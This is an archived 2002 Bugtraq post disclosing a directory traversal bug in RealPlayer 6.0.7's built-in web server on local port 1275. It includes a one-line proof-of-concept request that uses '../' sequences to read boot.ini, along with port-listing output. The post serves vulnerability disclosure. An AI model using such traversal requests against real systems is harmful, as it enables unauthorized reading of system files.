Home page logo
/

bugtraq logo Bugtraq mailing list archives

RealPlayer bug
From: "§ome1" <exe () FlashMail com>
Date: Sat, 2 Mar 2002 21:16:53 +0300


hi
open RealPlayer, go to --> File ---> Open File.. ---> Select any real media
file.. ex: c:\music\file.ram
Play the file.

Now go to ---> View ---> Clip Source

realplayer will open the url
http://127.0.0.1:1275/template.html?src=file://C:/music/file.ram
from now realplay.exe will listen on port 1275 TCP

as you can see, real player have a (Mini WebServer) that listen on port 1275

I only tested the ../../ bug

GET http://127.0.0.1:1275/../../../../../boot.ini
Result: my boot.ini

Vulnerable version: 6.0.7

other version? maybe..


C:\>fport |grep real
Pid       Process       Port      Proto     Path
1964    realplay   ->  1275     TCP      C:\Program
Files\Real\RealPlayer\realplay.exe



§ome1
exe () flashmail com


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault